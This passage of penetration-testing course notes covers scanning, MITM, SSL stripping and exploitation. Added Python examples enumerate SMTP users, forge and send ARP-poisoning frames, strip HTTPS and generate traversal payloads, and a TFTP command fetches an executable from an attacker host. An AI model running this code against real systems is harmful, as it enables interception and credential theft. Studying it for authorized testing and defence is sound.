● > nc -v [ipaddress] [port] - Use netcat to quickly pull a banner from a listening port.
● NMap - Powerful network port and vulnerability scanner. Manual can be found at
https://nmap.org/book/man.html
○ > nmap -sS (TCP SYN Scan) - Sends a SYN and judges the port from the reply (SYN/ACK = open, RST = closed, no reply = filtered) without completing the handshake ("half-open" scan); requires root/raw-socket privileges and is the default when run as root.
○ > nmap -sT (TCP connect scan) - Completes the full 3-way handshake using the OS connect() call; the default when not running as root, and more likely to be logged by the target service.
○ > nmap -sU (UDP Scan) - Sends UDP packets to check for open ports (slow; an ICMP port-unreachable reply means closed, no reply means open|filtered).
○ > nmap ... -oA [name_of_output_files] - Output results in all three formats at once: normal (.nmap), XML (.xml) and grepable (.gnmap).
○ > nmap ... -p - Specify ports to scan, e.g. -p 22,80,443 or -p 1-1024; -p- will scan all 65535 ports.
● Orderly note keeping is essential during penetration testing.
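Added example (the editor's, not part of the course material): the grepable file that nmap -oA name writes (name.gnmap) is meant to be processed, not read, and parsing it is the usual first step in turning scan results into the orderly notes the lesson asks for. The script below parses constructed -oG output into open ports per host and answers questions such as "which hosts have SMB open". The scan text is constructed for the example; the function names are the editor's.

```python
# Added example (not from the course material): parse nmap "grepable" (-oG /
# -oA *.gnmap) output into a dict of ports per host. The scan output below
# is constructed for the example.
import re

SAMPLE_GNMAP = (
    "# Nmap 7.80 scan initiated Tue Mar  3 10:02:11 2020 as: nmap -sS -sV -p- -oA scan 192.168.1.0/24\n"
    "Host: 192.168.1.10 (web01.lab.local)\tStatus: Up\n"
    "Host: 192.168.1.10 (web01.lab.local)\tPorts: 22/open/tcp//ssh//OpenSSH 7.9p1/, "
    "80/open/tcp//http//Apache httpd 2.4.38/, 443/closed/tcp//https///\tIgnored State: filtered (65532)\n"
    "Host: 192.168.1.20 ()\tStatus: Up\n"
    "Host: 192.168.1.20 ()\tPorts: 445/open/tcp//microsoft-ds//Windows 7 microsoft-ds/, "
    "3389/open/tcp//ms-wbt-server///\tIgnored State: closed (65533)\n"
    "# Nmap done at Tue Mar  3 10:40:51 2020 -- 256 IP addresses (2 hosts up) scanned in 2320.04 seconds\n"
)

_HOST = re.compile(r"^Host: (?P<ip>\S+) \((?P<name>[^)]*)\)")


def parse_port_entry(entry):
    """'22/open/tcp//ssh//OpenSSH 7.9p1/' -> dict. Field order in -oG output is
    port/state/protocol/owner/service/rpc info/version/ ; the version text can
    itself contain '/', so split only on the first six separators."""
    port, state, proto, owner, service, rpc, version = entry.split("/", 6)
    return {
        "port": int(port), "state": state, "proto": proto,
        "service": service, "version": version.rstrip("/"),
    }


def parse_gnmap(text):
    """Return {ip: {"hostname": str, "ports": [port dicts]}} for hosts with a Ports: field."""
    hosts = {}
    for line in text.splitlines():
        m = _HOST.match(line)
        if not m:
            continue                      # comment lines
        fields = line.split("\t")         # Host / Ports / Ignored State are tab-separated
        ports_field = next((f for f in fields if f.startswith("Ports: ")), None)
        if ports_field is None:
            continue                      # "Status: Up" lines carry no ports
        entries = ports_field[len("Ports: "):].split(", ")
        hosts[m.group("ip")] = {
            "hostname": m.group("name"),
            "ports": [parse_port_entry(e) for e in entries],
        }
    return hosts


def open_ports_by_host(text):
    """{ip: [port, ...]} keeping only the ports nmap reported as open."""
    return {ip: [p["port"] for p in info["ports"] if p["state"] == "open"]
            for ip, info in parse_gnmap(text).items()}


def hosts_running(text, service):
    """Sorted IPs with an open port whose service name matches, e.g. 'http' or 'microsoft-ds'."""
    return sorted(ip for ip, info in parse_gnmap(text).items()
                  if any(p["state"] == "open" and p["service"] == service for p in info["ports"]))


if __name__ == "__main__":
    for ip, ports in open_ports_by_host(SAMPLE_GNMAP).items():
        print(ip, ports)
    print("SMB hosts:", hosts_running(SAMPLE_GNMAP, "microsoft-ds"))
```

For anything beyond quick triage, the XML file (.xml) is the better input: it is the format nmap itself guarantees, and libraries such as python-libnmap parse it without regex.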

Teaching Assistant Extra Credit


● Tools like OWASP Amass (https://www.github.com/OWASP/Amass), Subfinder
(https://github.com/subfinder/subfinder) and MassDNS
(https://github.com/blechschmidt/massdns) are modern tools (as of 2019) that can help
automate the process of finding subdomains using DNS records.
● OWASP Amass has a functionality that allows importing of its data into Maltego.

 

● The Shodan CLI tool (installable on any Unix-like operating system) is sometimes able to
query the shodan database for patterns that are restricted on the website. Worth looking
into.

Module 5: Vulnerability Discovery/Scanning

Lesson 5.1: Vulnerability Scanning Intro (Part 1)


Skills Learned From This Lesson: Intro

Lesson 5.2: Vulnerability Scanning (Part 2) Nessus


Skills Learned From This Lesson: Vulnerability Scanning, Nessus Policies, Nessus Policy
Plugins
● Nessus - Automated vulnerability scanner. Offers free and paid professional version.
● > service nessusd start - Starts the Nessus Service (after installation)
● By default, the nessus Web Interface runs on port 8834 (localhost:8834,
127.0.0.1:8834).
○ Nessus Web Portal > Policies > New Policy - Adds new automated checks and
scans for Nessus to perform.
○ Nessus Web Portal > Policies > Select Existing Policy > Advanced Mode >
Plugins - Displays programs written in NASL that contain vulnerability
information, a simple set of remediation actions and the algorithm to test for the
presence of the security issue.
○ Nessus Web Portal > Scans > New Scan - Create and schedule a new
vulnerability scan for the specified hosts.

Lesson 5.3: Vulnerability Scanning (Part 3) Nmap Scripting Engine


Skills Learned From This Lesson: Nmap Scripting Engine Basics, NSE Vulnerability Scanning,
Service Enumeration
● It's a good idea to use the Nmap Scripting Engine (NSE) to verify results found using
automated vulnerability scanners.
● All NSE Scripts can be found in /usr/share/nmap/scripts in Kali Linux (and most other
Linux distributions).

 

● NSE Scripts are programmed in Lua and custom NSE scripts can be created using this
language.
● > nmap --script-help [search-pattern] - Display NSE script information related to the submitted search pattern, e.g. nmap --script-help "smb-vuln-*" (older Nmap releases shipped a single smb-check-vulns script, since split into the smb-vuln-* scripts).
○ > nmap --script=nfs-ls [target] - NSE script that lists the files on an exported NFS share, like running 'ls' against the NFS port.
● Use NSE with caution on real pentests. Some scripts can cause a Denial-of-Service to vulnerable systems. 'nmap --script safe' runs only scripts in the 'safe' category; 'nmap -sC' is shorthand for '--script default', which is mostly safe but includes a few intrusive scripts, so check a script's categories with --script-help before running it against production systems.
● In cases where services like FTP allow anonymous access to files, it's worth assessing
the risk and impact of the service being in this state before considering it a high priority
vulnerability.
● The 'VRFY' verb being usable on port 25/tcp (smtp) can assist in enumerating mail users
during penetration tests.

Lesson 5.4: Vulnerability Scanning (Part 4) WebApp, XAMPP, WebDAV, Nikto


Skills Learned From This Lesson: WebServer Vulnerability Scanning, Directory Brute-forcing,
Exploiting WebDAV
● XAMPP - An easy to install Web Stack consisting of Apache HTTP Server, MariaDB
database as well as PHP and Perl script interpreters.
● WebDAV - An extension of HTTP that allow clients to perform Web Content authoring
operations.
● > cadaver - Command line WebDAV client for Unix-based systems.
● Googling for default credentials on running services is a quick and easy way to attempt
to get access to a particular service.
● PHPMyAdmin - A free and open source admin tool for MySQL and MariaDB databases
written in PHP.
● When enumerating services for possible vulnerabilities, going through each server while
taking notes is recommended instead of diving head-first into the first potentially
vulnerable rabbit-hole.
● > dirbuster - A graphical tool for brute forcing directories on a web server.
● > nikto - An automated web server scanner that checks for dangerous files/CGIs, outdated server software and common misconfigurations. It is noisy and easily spotted in web server logs, so use it with that in mind on real engagements.

 

Lesson 5.5: Vulnerability Scanning (Part 5) Directory Traversal


Skills Learned From This Lesson: Traversing directories, Web Server Exploitation, User
Enumeration
● Directory Traversal/Path Traversal - An HTTP attack in which a path supplied by the client (typically containing '../' sequences) is used by the server without sanitisation, giving attackers access to files outside of the web server's root directory (reading configuration files and credentials, and, where an upload or log is involved, sometimes writing files too).
● It may be worth trying different amounts of the '../' string when attempting to exploit
Directory Traversal. Depending on where the root directory of the web server is installed,
the default value listed in a CVE may differ.
● Unless a webserver is running as SYSTEM (Windows Superuser) or root (Unix-like
Superuser), you may not have full access to all files and directories on the machine.
● Connecting to a listening smtp server with the 'VRFY' verb enabled using Netcat (nc
[ip.address.of.machine] 25) may allow an attacker to query the smtp server for active
mail accounts.
○ > nc 192.168.1.76 25
○ > VRFY (username)
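Added example (not part of the original study guide): a Python version of the VRFY enumeration above. The network wrapper does what the nc session does by hand; the protocol logic is separated from the socket so it also runs against the constructed FakeSmtp fixture, which stands in for a mail server with VRFY enabled. Host names, usernames and the 'probe.local' HELO name are assumptions.

```python
import socket
from typing import Callable, Dict, Iterable, Tuple

Reply = Tuple[int, str]


def read_reply(readline: Callable[[], bytes]) -> Reply:
    """Read one SMTP reply, joining multi-line replies ("250-..." continuation lines)."""
    texts = []
    while True:
        raw = readline()
        if not raw:
            raise ConnectionError("SMTP server closed the connection")
        line = raw.decode("utf-8", "replace").rstrip("\r\n")
        texts.append(line[4:])
        if len(line) < 4 or line[3] != "-":      # the final line has a space after the code
            return int(line[:3]), " ".join(texts)


def classify(code: int) -> str:
    """Map a VRFY reply code to what it tells the attacker (RFC 5321 semantics)."""
    return {
        250: "valid",             # mailbox exists, server echoed it back
        251: "valid (forwarded)",
        252: "cannot verify",     # server will not confirm; common Postfix default
        550: "invalid",           # no such user
        502: "VRFY disabled",     # command not implemented
    }.get(code, f"other ({code})")


def vrfy_enumerate(send: Callable[[bytes], object], readline: Callable[[], bytes],
                   users: Iterable[str], helo_name: str = "probe.local") -> Dict[str, str]:
    """Drive the VRFY conversation over an already-open connection.

    send/readline are injected so the same logic runs against a real socket or against
    the FakeSmtp fixture below. Returns {username: classification}.
    """
    code, banner = read_reply(readline)
    if code != 220:
        raise RuntimeError(f"unexpected banner: {code} {banner}")
    send(f"HELO {helo_name}\r\n".encode())
    code, text = read_reply(readline)
    if code != 250:
        raise RuntimeError(f"HELO rejected: {code} {text}")

    results: Dict[str, str] = {}
    for user in users:
        send(f"VRFY {user}\r\n".encode())
        code, _ = read_reply(readline)
        results[user] = classify(code)
        if code == 502:           # no point hammering a server that disabled VRFY
            break
    send(b"QUIT\r\n")
    return results


def vrfy_over_tcp(host: str, port: int, users: Iterable[str]) -> Dict[str, str]:
    """Real-network wrapper: the equivalent of 'nc host 25' followed by VRFY lines."""
    with socket.create_connection((host, port), timeout=10) as sock:
        reader = sock.makefile("rb")
        return vrfy_enumerate(sock.sendall, reader.readline, users)


class FakeSmtp:
    """Constructed stand-in for a mail server with VRFY enabled (test fixture, not a real host)."""

    def __init__(self, valid_users: Iterable[str]):
        self.valid = set(valid_users)
        self.pending = [b"220 mail.example.test ESMTP ready\r\n"]

    def send(self, data: bytes) -> None:
        verb, _, arg = data.decode().strip().partition(" ")
        if verb == "HELO":
            self.pending.append(b"250 mail.example.test\r\n")
        elif verb == "VRFY":
            if arg in self.valid:
                self.pending.append(f"250 {arg} <{arg}@example.test>\r\n".encode())
            else:
                self.pending.append(b"550 5.1.1 User unknown\r\n")
        elif verb == "QUIT":
            self.pending.append(b"221 Bye\r\n")

    def readline(self) -> bytes:
        return self.pending.pop(0) if self.pending else b""


if __name__ == "__main__":
    fake = FakeSmtp(["root", "postmaster"])
    print(vrfy_enumerate(fake.send, fake.readline, ["root", "admin", "postmaster", "test"]))
```

Against a real host, vrfy_over_tcp("192.168.1.76", 25, wordlist) replaces the fixture; a 252 for every name means the server is configured not to leak account existence and a different technique (RCPT TO, or EXPN) is needed.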

Teaching Assistant Extra Credit


● While dirbuster is an excellent directory brute-force tool, more modern tools (as of 2019)
exist that offer the same or greater functionality with less overhead, e.g. Gobuster
(https://github.com/OJ/gobuster), Dirsearch (https://github.com/maurosoria/dirsearch),
Konan (https://github.com/m4ll0k/Konan) and WFuzz (https://github.com/xmendez/wfuzz), to
name a few.
● Tools like Burp Suite and OWASP ZAP can also assist in vulnerability scanning on web
servers with built in discovery/brute-forcing engines and web spiders.
● Other web-based vulnerability scanners include WPScan (WordPress websites) and
Droopescan (Drupal CMS, as well as others).

Module 6: ​Traffic Capture

Lesson 6.1:​ ​Traffic Capture Introduction (Part 1)


Skills Learned From This Lesson: Intro

 

Lesson 6.2:​ ​Traffic Capture (Part 2) Analyzing Network Protocol with Wireshark
Skills Learned From This Lesson: Wireshark, Packet Captures, Wireshark Filters
● Wireshark - A free and open source packet analyzer. Offers the same capture functionality as
tcpdump with a graphical frontend and protocol dissectors.
● Protocols such as FTP transmit credentials and data in cleartext, so a capture of an FTP
session shows the username, password and file contents exactly as they were sent.
● Using display filters in Wireshark (e.g. 'ftp' or 'tcp.port == 21') clears the log of noise
and zeroes in on pertinent data in transit.

Lesson 6.3:​ ​Traffic Capture (Part 3) Address Resolution Protocol (ARP)


Skills Learned From This Lesson: arpspoof, Man-in-the-Middle attacks, Linux IP-Forwarding
● ARP Spoofing - An attacker sends forged ARP replies onto the network, associating the IP
address of a legitimate host (typically the gateway) with the attacker's MAC address in the
victims' ARP caches. Lays the foundation for a network-based Man-in-the-Middle attack.
● > arpspoof - an ARP packet spoofing CLI tool (part of the dsniff suite).
● IP forwarding must be enabled before running arpspoof by changing the value of
/proc/sys/net/ipv4/ip_forward from 0 to 1; otherwise the redirected traffic is dropped at the
attacker machine and the victims simply lose connectivity.
● When using arpspoof, one session must be started for each end of the MITM (target towards
gateway, and gateway towards target) so that both ARP caches are poisoned and traffic in either
direction is routed through the attacker machine.
● After the MITM attack is successful, Wireshark can be used to monitor the packet traffic
and inspect any unencrypted data in clear text.
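Added example (not part of the original study guide): what one arpspoof session puts on the wire, built by hand in Python. build_arp_reply forges the Ethernet+ARP frame, mitm_frames produces both halves of the poisoning described above, parse_arp decodes them, and detect_spoofing shows the defender's check (an IP whose MAC suddenly changes, the same idea arpwatch uses). All MAC and IP addresses are constructed lab values; send_frames needs Linux and root and is not exercised by the demo.

```python
import socket
import struct
from typing import Dict, List

ETH_P_ARP = 0x0806
ARP_REQUEST, ARP_REPLY = 1, 2
ARP_HDR = struct.Struct("!HHBBH")       # htype, ptype, hlen, plen, opcode


def mac_bytes(mac: str) -> bytes:
    return bytes(int(octet, 16) for octet in mac.split(":"))


def mac_str(raw: bytes) -> str:
    return ":".join(f"{b:02x}" for b in raw)


def build_arp_reply(attacker_mac: str, claimed_ip: str, victim_mac: str, victim_ip: str) -> bytes:
    """Ethernet frame carrying a forged ARP reply "claimed_ip is-at attacker_mac", unicast to victim.

    This is what one arpspoof session (-t victim claimed_ip) sends, repeatedly, so the
    victim's ARP cache maps claimed_ip to the attacker's MAC.
    """
    ether = mac_bytes(victim_mac) + mac_bytes(attacker_mac) + struct.pack("!H", ETH_P_ARP)
    arp = (ARP_HDR.pack(1, 0x0800, 6, 4, ARP_REPLY)                 # Ethernet/IPv4, reply
           + mac_bytes(attacker_mac) + socket.inet_aton(claimed_ip)  # sender fields: the lie
           + mac_bytes(victim_mac) + socket.inet_aton(victim_ip))    # target fields: who to poison
    return ether + arp


def mitm_frames(attacker_mac: str, target_mac: str, target_ip: str,
                gateway_mac: str, gateway_ip: str) -> List[bytes]:
    """Both halves of the MITM: poison the target about the gateway and the gateway about the target."""
    return [
        build_arp_reply(attacker_mac, gateway_ip, target_mac, target_ip),
        build_arp_reply(attacker_mac, target_ip, gateway_mac, gateway_ip),
    ]


def parse_arp(frame: bytes) -> Dict[str, object]:
    """Decode an Ethernet+ARP frame (42 bytes) into its fields."""
    if len(frame) < 42 or struct.unpack("!H", frame[12:14])[0] != ETH_P_ARP:
        raise ValueError("not an ARP frame")
    _, _, _, _, opcode = ARP_HDR.unpack(frame[14:22])
    return {
        "opcode": opcode,
        "sender_mac": mac_str(frame[22:28]),
        "sender_ip": socket.inet_ntoa(frame[28:32]),
        "target_mac": mac_str(frame[32:38]),
        "target_ip": socket.inet_ntoa(frame[38:42]),
    }


def detect_spoofing(frames: List[bytes], known: Dict[str, str]) -> List[str]:
    """Defender's view: flag replies whose sender IP is bound to a different MAC than the one on record."""
    alerts = []
    for frame in frames:
        arp = parse_arp(frame)
        expected = known.get(arp["sender_ip"])
        if arp["opcode"] == ARP_REPLY and expected and expected != arp["sender_mac"]:
            alerts.append(f"{arp['sender_ip']} claimed by {arp['sender_mac']} (expected {expected})")
    return alerts


def send_frames(interface: str, frames: List[bytes]) -> None:
    """Put the frames on the wire (Linux only, needs root). Not run in the demo below."""
    with socket.socket(socket.AF_PACKET, socket.SOCK_RAW) as raw:
        raw.bind((interface, 0))
        for frame in frames:
            raw.send(frame)


if __name__ == "__main__":
    # Constructed lab addresses (not from the original page): attacker, target, gateway.
    frames = mitm_frames("aa:bb:cc:dd:ee:ff", "00:11:22:33:44:55", "192.168.1.76",
                         "00:aa:bb:cc:dd:01", "192.168.1.1")
    for f in frames:
        print(parse_arp(f))
    print(detect_spoofing(frames, {"192.168.1.1": "00:aa:bb:cc:dd:01",
                                   "192.168.1.76": "00:11:22:33:44:55"}))
```

arpspoof re-sends these frames every couple of seconds because the poisoned entries age out; when it exits it sends correct replies to repair the caches, which a hand-rolled version also has to do or the victims stay disconnected.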

Lesson 6.4:​ ​Traffic Capture (Part 4) DNS


Skills Learned From This Lesson: DNS, DNS Cache Poisoning, dnsspoof
● The Domain Name System (DNS) translates a domain name (gmail.com) into an IP address
(17.18.19.20) and so tells a host which IP address to send its traffic to when a domain name
is used.
● > dnsspoof - a command line tool (also from dsniff) that answers DNS queries seen on the wire
with forged replies, routing traffic intended for the legitimate IP address of a domain name to
an attacker machine. The -f file uses hosts-file syntax (IP address, then hostname; wildcards
such as *.example.com are allowed); without -f every query is answered with the attacker's own
address.
○ > dnsspoof -i [interface] -f /root/hosts.txt
● ARP spoofing must be used between the gateway and the target so that the target's DNS
queries pass through the attacker machine; the forged answer then has to reach the target before
the legitimate DNS server's reply does, which is why the attacker must already be on the path.

 

Lesson 6.5:​ ​Traffic Capture (Part 5) Ettercap


Skills Learned From This Lesson: ettercap, SSL/TLS encryption, SSL/TLS certificates
● Encrypted traffic, such as HTTPS (HTTP over SSL/TLS), cannot be read using ARP spoofing and
traffic capture alone; the attacker sees only ciphertext. Some technique must be used to insert
the attacker into the secure connection between the target host and the destination server,
typically by terminating TLS at the attacker with a forged certificate.
● A certificate error in the victim's browser is the visible symptom that a secure connection to
the server has been intercepted by such a MITM attack.
● > ettercap - An open source network security tool for man-in-the-middle attacks on a
LAN; it can perform both the ARP poisoning and the TLS interception itself.

Lesson 6.6:​ ​Traffic Capture (Part 6) SSL Stripping


Skills Learned From This Lesson: SSL Stripping, iptables, Routing Rules
● SSL Stripping is the practice of downgrading HTTPS to plain HTTP on the victim's side of the
MITM while forwarding the intercepted traffic to the destination server over HTTPS. This
technique circumvents the certificate error that appears in a TLS MITM with ettercap alone and
still allows cleartext inspection of the target's traffic. It only works when the victim's first
request is plain HTTP; HTTP Strict Transport Security (HSTS), once seen or preloaded by the
browser, makes the browser insist on HTTPS and defeats the downgrade.
● Modern browsers will note that the traffic being sent is 'not secure' in the address bar
and will not show the padlock icon next to the URL.
● > iptables - Linux user-space utility allowing the configuration of the Linux kernel firewall
○ > iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port
8080 - iptables command to redirect forwarded traffic arriving for port 80 to the SSL Strip
listener on local port 8080.
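Added example (not part of the original study guide or of the sslstrip tool): the core rewriting an SSL-stripping proxy performs, in Python. downgrade_response rewrites https:// links and the Location header to http://, strips the HSTS header and the Secure cookie flag, and records which hosts were downgraded; upstream_url re-upgrades the victim's later plain-HTTP request so the server side stays HTTPS; browser_refuses_downgrade shows why a host already in the browser's HSTS store is out of reach. The headers, body and host names are constructed.

```python
import re
from typing import Dict, Set, Tuple

HTTPS_URL = re.compile(rb"https://([A-Za-z0-9.-]+)", re.IGNORECASE)


def downgrade_response(headers: Dict[str, str], body: bytes,
                       stripped_hosts: Set[str]) -> Tuple[Dict[str, str], bytes]:
    """What the proxy does to a server response before handing it to the victim.

    Every https:// URL in the body and in Location becomes http://, and the host is remembered
    so the proxy knows to fetch it over HTTPS later. Headers and cookie flags that would break
    the downgrade on the browser side are removed.
    """
    def rewrite(match: "re.Match[bytes]") -> bytes:
        stripped_hosts.add(match.group(1).decode().lower())
        return b"http://" + match.group(1)

    new_body = HTTPS_URL.sub(rewrite, body)
    new_headers: Dict[str, str] = {}
    for name, value in headers.items():
        lname = name.lower()
        if lname == "strict-transport-security":
            continue                                   # HSTS would pin the browser to HTTPS
        if lname == "location":
            value = HTTPS_URL.sub(rewrite, value.encode()).decode()
        if lname == "set-cookie":
            # A Secure cookie is never sent over HTTP, so the session would break without this
            value = re.sub(r";\s*secure", "", value, flags=re.IGNORECASE)
        new_headers[name] = value
    return new_headers, new_body


def upstream_url(victim_url: str, stripped_hosts: Set[str]) -> str:
    """Victim asks for http://host/...; the proxy re-upgrades it for hosts it stripped earlier."""
    m = re.match(r"http://([A-Za-z0-9.-]+)(.*)", victim_url, re.IGNORECASE)
    if m and m.group(1).lower() in stripped_hosts:
        return "https://" + m.group(1) + m.group(2)
    return victim_url


def browser_refuses_downgrade(host: str, hsts_cache: Set[str]) -> bool:
    """Why the attack fails against HSTS: a browser that has host (or, with includeSubDomains,
    a parent domain) in its HSTS store never sends the plain-HTTP request the proxy relies on."""
    host = host.lower()
    return any(host == h or host.endswith("." + h) for h in hsts_cache)


if __name__ == "__main__":
    # Constructed sample response (not from the original page).
    hdrs = {"Location": "https://login.example.test/account",
            "Strict-Transport-Security": "max-age=31536000",
            "Set-Cookie": "session=abc; Secure; HttpOnly"}
    body = b'<a href="https://login.example.test/login">Sign in</a>'
    seen: Set[str] = set()
    print(downgrade_response(hdrs, body, seen))
    print(upstream_url("http://login.example.test/login", seen))
    print(browser_refuses_downgrade("login.example.test", {"example.test"}))
```

The iptables REDIRECT above is what delivers the victim's port-80 traffic to a listener running this logic; the listener itself needs a real HTTP proxy loop around these functions.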

Teaching Assistant Extra Credit


● A more recently developed framework for ARP cache poisoning and MITM attacks can be
found in Bettercap (https://github.com/bettercap/bettercap). This framework can also be
used to carry out Wi-Fi attacks and has a slick web UI for beginners.
● dsniff (https://www.monkey.org/~dugsong/dsniff) is an excellent tool to monitor network
traffic for interesting data during a MITM attack.
● Browser extensions like HTTPS Everywhere force an HTTPS connection to a site and redirect to
a warning page notifying the user when a site only offers an insecure transport; current
Firefox and Chrome releases build the same behaviour in as an HTTPS-only mode.
● Evilginx (originally a MITM web server built on Nginx; evilginx2 is a standalone rewrite in
Go) is a modern MITM tool that uses 'phishlets' to act as a doppelganger of a legitimate site,
complete with SSL/TLS
 

encryption, and forwards all traffic to the legitimate host while harvesting the target's
credentials, session cookies and 2-factor authentication tokens
(https://github.com/kgretzky/evilginx2).

Module 7: ​Exploitation

Lesson 7.1:​ ​Exploitation (Part 1) Direct Exploitation


Skills Learned From This Lesson: Webshells, WebDAV Uploads, msfvenom/Meterpreter
● > In Web Application Exploitation, it's common to take advantage of the
programming/scripting language found on the site during exploitation. Here are some
examples:
○ > PHP (LAMP, LEMP, Wordpress, etc)
○ > Javascript (NodeJS, etc.)
○ > Python (Flask, Django)
○ > Perl (WAMPP, XAMPP)
○ > Ruby (Ruby on Rails)
○ > Go (Buffalo)
○ > Java (JBoss, Apache Tomcat)
○ > ASP.NET (Windows IIS)
● Default webshells coded in various web programming languages included in Kali Linux
can be found in /usr/share/webshells/
● If WebDAV is enabled on a Web Application, Cadaver can be used to upload a webshell
coded in the appropriate programming language to gain an initial foothold.
● Msfvenom can be utilized to create a staged reverse shell payload, Cadaver to upload
the created payload, and the exploit/multi/handler module in msfconsole to catch the Meterpreter
reverse shell returning from the target.
● Mimikatz - An open-source utility that enables the capture of credentials and Kerberos
tickets from the Windows Local Security Authority Subsystem Service (LSASS) on a
Windows machine.
● msf exploit (handler) > show advanced - Displays advanced settings to tune the handling
of the reverse shell received from the target

 

○ > ExitOnSession - Advanced option, can be set to FALSE to allow multiple


sessions from a mass distributed payload to return to the handler instead of it
exiting after the return of a single shell. Requires running as a job upon running
(exploit -j)
○ > sessions -l - List active sessions.
○ > sessions -i [session#] - Interact with the specified session.
● meterpreter > sysinfo - Displays basic information of the exploited Windows machine.
● meterpreter > getuid - Displays the current user and permissions for the exploited
process that meterpreter is in control of.

Lesson 7.2:​ ​Exploitation (Part 2) SQL commands


Skills Learned From This Lesson: Database Exploitation, SQL Commands, Trivial File Transfer
Protocol
● SQL (Structured Query Language) - The standard language used to define, query and manage
relational databases.
● Most Common Web Databases - MySQL/MariaDB, Oracle, MSSQL, MongoDB
(NoSQL), PostgreSQL
● Some admin web applications (such as phpMyAdmin) that allow arbitrary SQL queries to be run
against the database may let an attacker write a PHP webshell into the web root, e.g. with
MySQL's SELECT ... INTO OUTFILE, provided the database account has the FILE privilege and the
server's secure_file_priv setting permits writing to that directory.
● With SQL injection, it is also possible to dump the credentials for the user accounts held
in the database and possibly log in with escalated privileges.
● On Windows, TFTP (Trivial File Transfer Protocol) can be used to transfer files onto the
target machine when the tftp client is installed (tftp -i [attacker.ip] GET file.exe). Where
TFTP isn't available, PowerShell can be used to accomplish the same.
● atftpd - Linux TFTP service that can be used to serve files from a specified directory.

Lesson 7.3:​ ​Exploitation (Part 3) Directory Traversal


Skills Learned From This Lesson: Directory Traversal, Post-exploitation Recon, Security
Account Manager Forensics
● What data can be accessed in Directory Traversal exploits is entirely dependent on the
permissions that the exploited service is running with and the nuances of the operating
system you are exploiting.
● Security Account Manager (SAM) - Registry hive in Windows that stores the LM/NT password
hashes of local accounts, encrypted with a key derived from the boot key held in the SYSTEM hive.
 

● In Windows XP, there is a backup of the SAM file in '\WINDOWS\repair\sam' that can be
read when the live SAM itself is locked. The boot key (SYSKEY) from the SYSTEM hive (a copy sits
alongside it in '\WINDOWS\repair\system') is needed to decrypt the backed up data.
● Enumeration of active services can be useful when looking for interesting files and
directories during Directory Traversal exploitation. e.g. looking into ftp shares via
directory traversal exploitation.
● The existence of active default user accounts can be discovered during directory
traversal exploitation and recon.
● Exploits like directory traversal are ideal when exploiting services that may crash under
even a light load. Since these exploits take advantage of the normal functionality of the
service, these have a far less intrusive impact than a kernel exploit, buffer overflow,
memory corruption or the like.
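Added example (not part of the original study guide): the two sides of directory traversal in Python. traversal_payloads generates the candidate paths at every depth (the 'try different amounts of ../' advice from Lesson 5.5) in plain, URL-encoded and Windows-separator forms; vulnerable_resolve shows the flawed path handling that lets them escape the web root, and safe_resolve the check that stops them. The web root and target file are constructed.

```python
import posixpath
from typing import List, Optional
from urllib.parse import quote


def traversal_payloads(target: str, max_depth: int = 8) -> List[str]:
    """Candidate request paths for one target file at every depth 1..max_depth.

    Three forms per depth: plain, URL-encoded (..%2F..%2F...) and Windows separators.
    The depth that works depends on where the web root sits, which is why a single value
    copied from a CVE write-up often fails on a differently laid-out server.
    """
    payloads = []
    rel = target.lstrip("/")
    for depth in range(1, max_depth + 1):
        unix = "../" * depth + rel
        payloads.append(unix)
        payloads.append(quote(unix, safe=""))
        payloads.append("..\\" * depth + rel.replace("/", "\\"))
    return payloads


def vulnerable_resolve(web_root: str, requested: str) -> str:
    """The flaw: join and serve. '../' walks out of web_root, and a leading '/' replaces it
    entirely (posixpath.join discards the root for absolute paths)."""
    return posixpath.normpath(posixpath.join(web_root, requested))


def safe_resolve(web_root: str, requested: str) -> Optional[str]:
    """The fix: strip any leading '/', normalise, then require the result to stay inside web_root.

    Input must already be URL-decoded exactly once before this check. A real server should
    also apply os.path.realpath so that symlinks inside the root cannot point outside it.
    """
    root = posixpath.normpath(web_root)
    full = posixpath.normpath(posixpath.join(root, requested.lstrip("/")))
    if full == root or full.startswith(root + "/"):
        return full
    return None                      # escaped the document root: reject the request


if __name__ == "__main__":
    # Constructed layout: web root three levels below '/', as on a typical Debian Apache install.
    root = "/var/www/html"
    for p in traversal_payloads("/etc/passwd", 3):
        print(f"{p:32} -> vulnerable: {vulnerable_resolve(root, p)!s:22} safe: {safe_resolve(root, p)}")
```

Against the lab target, each payload is sent in place of the filename parameter the vulnerable application expects; the first response containing '/etc/passwd' content (or 'boot.ini' on older Windows) reveals the correct depth.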

Lesson 7.4:​ ​Exploitation (Part 4) Open Source Vulnerability


Skills Learned From This Lesson: OSVDB, Webserver Security, Common Misconfigurations
● Open Source Vulnerability Database (OSVDB) - An independent vulnerability database whose goal
was to provide accurate, detailed, current, and unbiased technical information on security
vulnerabilities. The database was shut down in 2016, though the blog continued to exist.
● Best practice when deploying web servers is to run the web server as an unprivileged
user, normally www-data on Debian-based systems.
● msf > info path/to/exploit - Gives info on an exploit and displays links to references and
POCs that explain the exploit and/or how to use the module properly.

Lesson 7.5:​ ​Exploitation (Part 5) Using Backdoor to Access an FTP Server


Skills Learned From This Lesson: VSFTPD Backdoor, Remote Access Software, Non-Standard
Ports Scanning
● VSFTPD 2.3.4 - The source archive on the project's download site was replaced for a short
time with a backdoored copy, which was distributed to servers that installed it during that
window. The backdoor is triggered by logging in with a username containing ':)' and spawns a
root shell listening on TCP port 6200.
● During pentests, it's a good idea to look out for nonstandard ports that may have a
remote administration tool or other vulnerable remote access software running that a
sysadmin could have left running.
 

Lesson 7.6:​ ​Exploitation (Part 6) Attaching to an IP Address


Skills Learned From This Lesson: NFS Shares, SSH, Private Keys
● > showmount - Show mount information for an NFS server (showmount -e [ip.address.of.server]
lists the exported shares).
● > mount -t nfs -o nolock [ip.address.of.server]:/path/to/shared/directory /mountpoint -
Mounts a remote NFS server's file share. NFS trusts the UID presented by the client, so a local
user created with the same UID as the owner of a file on the share can read that file.
● > ssh-add - Adds private key identities (by default the keys in ~/.ssh) to the running
ssh-agent so that ssh can use them without being pointed at the key file each time.
● > ssh -i /path/to/private.key [user]@[ip.address.of.server] - Accesses ssh with the given
private key without using ssh-add. The key file must be restricted to its owner using
'chmod 600 private.key' or ssh will refuse to use it.

Teaching Assistant Extra Credit


● Two excellent Windows post-exploitation frameworks that play well with metasploit are
Powershell Empire (https://www.powershellempire.com/) and Nishang
(https://github.com/samratashok/nishang.git).
● In addition to the webshells covered, Weevely (https://github.com/epinna/weevely3) is an
